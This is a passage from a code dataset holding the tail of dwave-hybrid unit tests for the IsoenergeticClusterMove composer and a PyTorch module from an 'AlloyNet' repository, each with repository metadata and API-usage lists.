return sum(float(sum(state.samples.record.energy)) for state in states)\n\n def test_validation(self):\n bqm1 = dimod.BinaryQuadraticModel({'a': 1}, {}, 0, dimod.SPIN)\n bqm2 = dimod.BinaryQuadraticModel({'b': 1}, {}, 0, dimod.SPIN)\n s1 = State.from_sample({'a': +1}, bqm1)\n s2 = State.from_sample({'b': -1}, bqm2)\n\n # two input states required\n with self.assertRaises(ValueError):\n inp = States(s1, s1, s1)\n IsoenergeticClusterMove().run(inp).result()\n\n # variables must match\n with self.assertRaises(ValueError):\n inp = States(s1, s2)\n IsoenergeticClusterMove().run(inp).result()\n\n def test_triangle_flip(self):\n bqm = dimod.BQM.from_qubo({'ab': 1, 'bc': 1, 'ca': 1})\n s1 = State.from_samples({'a': 0, 'b': 1, 'c': 1}, bqm)\n s2 = State.from_samples({'a': 1, 'b': 0, 'c': 1}, bqm)\n\n icm = IsoenergeticClusterMove()\n inp = States(s1, s2)\n res = icm.run(inp).result()\n\n # Expected: ('a', 'b') identified as (the sole) cluster, selected,\n # resulting in variables {'a', 'b'} flipped. 
Effectively, input states\n # are simply swapped.\n self.assertEqual(res[0].samples, s2.samples)\n self.assertEqual(res[1].samples, s1.samples)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n def test_ising_triangle_flip(self):\n bqm = dimod.BQM.from_ising({}, {'ab': 1, 'bc': 1, 'ca': 1})\n s1 = State.from_samples({'a': -1, 'b': +1, 'c': +1}, bqm)\n s2 = State.from_samples({'a': +1, 'b': -1, 'c': +1}, bqm)\n\n icm = IsoenergeticClusterMove()\n inp = States(s1, s2)\n res = icm.run(inp).result()\n\n # Expected: ('a', 'b') identified as (the sole) cluster, selected,\n # resulting in variables {'a', 'b'} flipped. Effectively, input states\n # are simply swapped.\n self.assertEqual(res[0].samples, s2.samples)\n self.assertEqual(res[1].samples, s1.samples)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n def test_small_lattice(self):\n graph = nx.generators.lattice.grid_2d_graph(5, 5)\n bqm = dimod.generators.uniform(graph, vartype=dimod.BINARY, low=1, high=1)\n nodes = sorted(bqm.variables)\n\n s1 = State.from_samples(dict(zip(nodes, [0, 1, 0, 1, 1,\n 0, 0, 0, 1, 0,\n 0, 0, 0, 0, 1,\n 0, 0, 1, 1, 0,\n 1, 0, 1, 0, 0])), bqm)\n s2 = State.from_samples(dict(zip(nodes, [0, 1, 1, 0, 0,\n 0, 0, 0, 1, 1,\n 0, 1, 1, 0, 1,\n 0, 1, 0, 0, 0,\n 1, 0, 0, 1, 0])), bqm)\n\n exp1 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 1, 0, 1, 1,\n 0, 0, 0, 1, 0,\n 0, 1, 1, 0, 1,\n 0, 1, 0, 0, 0,\n 1, 0, 0, 1, 0])), bqm)\n exp2 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 1, 1, 0, 0,\n 0, 0, 0, 1, 1,\n 0, 0, 0, 0, 1,\n 0, 0, 1, 1, 0,\n 1, 0, 1, 0, 0])), bqm)\n\n icm = IsoenergeticClusterMove(seed=1234)\n inp = States(s1, s2)\n res = icm.run(inp).result()\n\n self.assertEqual(res[0].samples, exp1)\n self.assertEqual(res[1].samples, exp2)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n def test_bimodal_cluster_sampling_statistics(self):\n bqm = dimod.BQM.from_qubo({'ab': 1, 'bd': 1, 'dc': 1, 'ca': 1})\n nodes = sorted(bqm.variables)\n\n s1 = State.from_samples(dict(zip(nodes, [0, 1,\n 0, 0])), bqm)\n s2 = State.from_samples(dict(zip(nodes, [0, 0,\n 1, 0])), bqm)\n\n exp1 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 0,\n 0, 0])), bqm)\n exp2 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 1,\n 1, 0])), bqm)\n\n icm = IsoenergeticClusterMove(seed=None)\n inp = States(s1, s2)\n exp = [exp1, exp2]\n\n # split between [exp1, exp2] and [exp2, exp1] as output samples\n # should be ~50%\n cnt = 0\n n = 100\n for _ in range(n):\n res = icm.run(inp).result()\n r1, r2 = pluck(res, 'samples')\n\n # test responses are valid\n self.assertIn(r1, exp)\n self.assertIn(r2, exp)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n # count responses\n if r1 == exp1 and r2 == exp2:\n cnt += 1\n\n self.assertLess(cnt, 0.75 * n)\n self.assertGreater(cnt, 0.25 * n)\n\n def test_large_sparse(self):\n \"Total energy is preserved after ICM on random samples over random graph.\"\n\n # random Erdős-Rényi sparse graph with 100 nodes and 10% density\n graph = nx.generators.fast_gnp_random_graph(n=100, p=0.1)\n bqm = dimod.generators.uniform(graph=graph, vartype=dimod.SPIN)\n nodes = sorted(bqm.variables)\n\n # random input samples\n s1 = State.from_problem(bqm, samples=random_sample)\n s2 = State.from_problem(bqm, 
samples=random_sample)\n inp = States(s1, s2)\n\n icm = IsoenergeticClusterMove()\n res = icm.run(inp).result()\n\n self.assertAlmostEqual(self.total_energy(inp), self.total_energy(res))\n", "repo_name": "dwavesystems/dwave-hybrid", "sub_path": "tests/test_composers.py", "file_name": "test_composers.py", "file_ext": "py", "file_size_in_byte": 15995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 78, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 20, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 20, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 26, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 28, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 28, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 30, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 36, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 36, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 37, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 37, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 38, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 38, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 39, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 39, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 40, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 40, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 41, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 41, "usage_type": "call"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 43, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 43, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 46, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 47, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 50, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 50, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 59, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 59, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 61, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 61, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 63, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 66, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 66, "usage_type": "name"}, {"api_name": "dimod.BQM.from_ising", "line_number": 69, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 69, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_problem", "line_number": 70, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 70, 
"usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 73, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 82, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 82, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 83, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 83, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 84, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 84, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 85, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 85, "usage_type": "call"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 88, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 88, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 90, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 90, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 91, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 91, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 94, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 97, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 98, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 98, "usage_type": "name"}, {"api_name": "hybrid.utils.min_sample", "line_number": 98, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 99, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 99, "usage_type": "name"}, {"api_name": "hybrid.utils.max_sample", "line_number": 99, "usage_type": "call"}, {"api_name": "hybrid.composers.GreedyPathMerge", "line_number": 101, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 101, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 106, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 109, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 109, "usage_type": "attribute"}, {"api_name": "hybrid.core.States", "line_number": 111, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 111, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 111, "usage_type": "name"}, {"api_name": "hybrid.composers.MergeSamples", "line_number": 113, "usage_type": "call"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 118, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 118, "usage_type": "attribute"}, {"api_name": "hybrid.core.States", "line_number": 120, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 120, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 120, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 121, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 121, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 123, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 123, "usage_type": "name"}, {"api_name": 
"hybrid.composers.MergeSamples", "line_number": 125, "usage_type": "call"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 130, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 130, "usage_type": "attribute"}, {"api_name": "hybrid.core.States", "line_number": 132, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 132, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 132, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 133, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 133, "usage_type": "name"}, {"api_name": "hybrid.core.State", "line_number": 135, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples_bqm", "line_number": 137, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 137, "usage_type": "attribute"}, {"api_name": "hybrid.composers.MergeSamples", "line_number": 140, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 145, "usage_type": "attribute"}, {"api_name": "dimod.BQM.from_ising", "line_number": 150, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 150, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 152, "usage_type": "call"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 154, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 156, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.empty", "line_number": 156, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 156, "usage_type": "name"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 158, "usage_type": "call"}, {"api_name": "dimod.BQM.from_ising", "line_number": 163, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 163, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 165, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 165, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 167, "usage_type": "call"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 169, "usage_type": "call"}, {"api_name": "dimod.BQM.from_ising", "line_number": 176, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 176, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 178, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 178, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 181, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 181, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 181, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 182, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 182, "usage_type": "name"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 184, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 189, "usage_type": "attribute"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 193, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 193, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 193, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 194, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", 
"line_number": 196, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 199, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 204, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 204, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 204, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 204, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 205, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 207, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 210, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 215, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 215, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 215, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 215, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 216, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 218, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 221, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 225, "usage_type": "attribute"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 229, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 229, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 229, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 229, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 230, "usage_type": "call"}, {"api_name": "hybrid.composers.AggregatedSamples", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 235, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 240, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 240, "usage_type": "attribute"}, {"api_name": "dimod.SPIN", "line_number": 241, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 243, "usage_type": "call"}, {"api_name": "hybrid.composers.AggregatedSamples", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 256, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 257, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 263, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 271, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 271, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 272, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 272, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 273, "usage_type": "call"}, {"api_name": 
"hybrid.core.State", "line_number": 273, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 274, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 274, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 278, "usage_type": "call"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 279, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 283, "usage_type": "call"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 284, "usage_type": "call"}, {"api_name": "dimod.BQM.from_qubo", "line_number": 287, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 287, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 288, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 288, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 289, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 289, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 291, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 292, "usage_type": "call"}, {"api_name": "dimod.BQM.from_ising", "line_number": 305, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 305, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 306, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 306, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 307, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 307, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 309, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 310, "usage_type": "call"}, {"api_name": "networkx.generators.lattice.grid_2d_graph", "line_number": 323, "usage_type": "call"}, {"api_name": "networkx.generators", "line_number": 323, "usage_type": "attribute"}, {"api_name": "dimod.generators.uniform", "line_number": 324, "usage_type": "call"}, {"api_name": "dimod.generators", "line_number": 324, "usage_type": "attribute"}, {"api_name": "dimod.BINARY", "line_number": 324, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 327, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 327, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 332, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 332, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 338, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 338, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 343, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 343, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 349, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 350, "usage_type": "call"}, {"api_name": "dimod.BQM.from_qubo", "line_number": 360, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 360, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 363, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 363, "usage_type": "name"}, {"api_name": 
"hybrid.core.State.from_samples", "line_number": 365, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 365, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 368, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 368, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 370, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 370, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 373, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 374, "usage_type": "call"}, {"api_name": "plucky.pluck", "line_number": 383, "usage_type": "call"}, {"api_name": "networkx.generators.fast_gnp_random_graph", "line_number": 403, "usage_type": "call"}, {"api_name": "networkx.generators", "line_number": 403, "usage_type": "attribute"}, {"api_name": "dimod.generators.uniform", "line_number": 404, "usage_type": "call"}, {"api_name": "dimod.generators", "line_number": 404, "usage_type": "attribute"}, {"api_name": "dimod.SPIN", "line_number": 404, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_problem", "line_number": 408, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 408, "usage_type": "name"}, {"api_name": "hybrid.utils.random_sample", "line_number": 408, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_problem", "line_number": 409, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 409, "usage_type": "name"}, {"api_name": "hybrid.utils.random_sample", "line_number": 409, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 410, "usage_type": "call"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 412, "usage_type": "call"}]} +{"seq_id": "14805884942", "text": "import torch\r\nfrom torch import nn, optim\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import Dataset, TensorDataset, DataLoader\r\nfrom torch.utils.data import random_split\r\n\r\nclass GenData(Dataset):\r\n def __init__(self, features1, features2, labels): \r\n self.features1 = features1 \r\n self.features2 = features2\r\n self.labels = labels \r\n self.lens = len(features1) \r\n\r\n def __getitem__(self, index): \r\n return self.features1[index,:], self.features2[index,:], self.labels[index]\r\n\r\n def __len__(self): \r\n return self.lens\r\n\r\ndef split_loader(features1, features2, labels, batch_size=10, rate=0.7):\r\n data = GenData(features1, features2, labels)\r\n num_train = int(data.lens * 0.7)\r\n num_test = data.lens - num_train\r\n data_train, data_test = random_split(data, [num_train, num_test])\r\n train_loader = DataLoader(data_train, batch_size=batch_size, shuffle=True)\r\n test_loader = DataLoader(data_test, batch_size=batch_size, shuffle=False)\r\n return train_loader, test_loader\r\n\r\ndef mse_cal(data_loader, net):\r\n data = data_loader.dataset \r\n X1 = data[:][0] \r\n X2 = data[:][1]\r\n y = data[:][2] \r\n yhat = net(X1, X2)\r\n return F.mse_loss(yhat, y).detach().numpy().round(4)\r\n\r\ndef mae_cal(data_loader, net):\r\n data = data_loader.dataset \r\n X1 = data[:][0] \r\n X2 = data[:][1]\r\n y = data[:][2] \r\n yhat = net(X1, X2)\r\n mae = nn.L1Loss()\r\n return mae(yhat, y).detach().numpy().round(4)\r\n\r\nclass FCLayer(nn.Module):\r\n def __init__(self, in_dim, mid_dim, out_dim, num_fc, \r\n act_fun=nn.Softplus(), BN_model=None, momentum=0.1):\r\n super().__init__()\r\n 
\r\n        dim_list = [in_dim, *([mid_dim] * (num_fc - 1))]\r\n        \r\n        layers = []\r\n        for i in range(len(dim_list)-1):\r\n            if BN_model == None:\r\n                layers.extend([nn.Linear(dim_list[i], dim_list[i+1]), act_fun]) \r\n            elif BN_model == 'pre':\r\n                layers.extend([nn.Linear(dim_list[i], dim_list[i+1]), \r\n                               nn.BatchNorm1d(dim_list[i+1], momentum=momentum), act_fun])\r\n            elif BN_model == 'post':\r\n                layers.extend([nn.Linear(dim_list[i], dim_list[i+1]), \r\n                               act_fun, nn.BatchNorm1d(dim_list[i+1], momentum=momentum)])\r\n        layers.append(nn.Linear(mid_dim, out_dim)) # no act_fun in the last layer\r\n        \r\n        self.fc = nn.Sequential(*layers)\r\n        self.fc.apply(self.init_weights)\r\n    \r\n    def init_weights(self, m):\r\n        if isinstance(m, nn.Linear):\r\n            torch.nn.init.xavier_uniform_(m.weight)\r\n            m.bias.data.fill_(0)\r\n    \r\n    def forward(self, x):\r\n        return self.fc(x)\r\n\r\nclass AlloyNet(nn.Module):\r\n    def __init__(self, act_fun=nn.Softplus(), num_fc=3, BN_model=None):\r\n        \r\n        super().__init__()\r\n        \r\n        self.fc1 = FCLayer(in_dim=3, mid_dim=3, out_dim=1, num_fc=num_fc, act_fun=act_fun, BN_model=BN_model)\r\n        self.fc2 = FCLayer(in_dim=3, mid_dim=3, out_dim=1, num_fc=num_fc, act_fun=act_fun, BN_model=BN_model)\r\n        self.fc3 = FCLayer(in_dim=2, mid_dim=3, out_dim=1, num_fc=num_fc, act_fun=act_fun, BN_model=BN_model)\r\n        \r\n        self.ln1 = nn.Linear(2, 1)\r\n        \r\n    def forward(self, x1, x2):\r\n        \r\n        m = x1.reshape(x1.shape[0]*3*6, 3)\r\n        m = self.fc1(m)\r\n        m = m.reshape(x1.shape[0], 3, 6)\r\n        m = torch.sum(m, 2)\r\n        m = self.fc2(m)\r\n        \r\n        n = x2.reshape(x2.shape[0]*3, 2)\r\n        n = self.fc3(n)\r\n        n = n.reshape(x2.shape[0], 3)\r\n        n = torch.sum(n, 1, keepdim=True)\r\n        \r\n        mn = torch.cat([m, n], 1)\r\n        \r\n        out = self.ln1(mn)\r\n        \r\n        return out\r\n\r\n", "repo_name": "jiaozihao18/AlloyNet", "sub_path": "func.py", "file_name": "func.py", "file_ext": "py", "file_size_in_byte": 4017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Softplus", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": 
"torch.nn.BatchNorm1d", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Softplus", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 85, "usage_type": 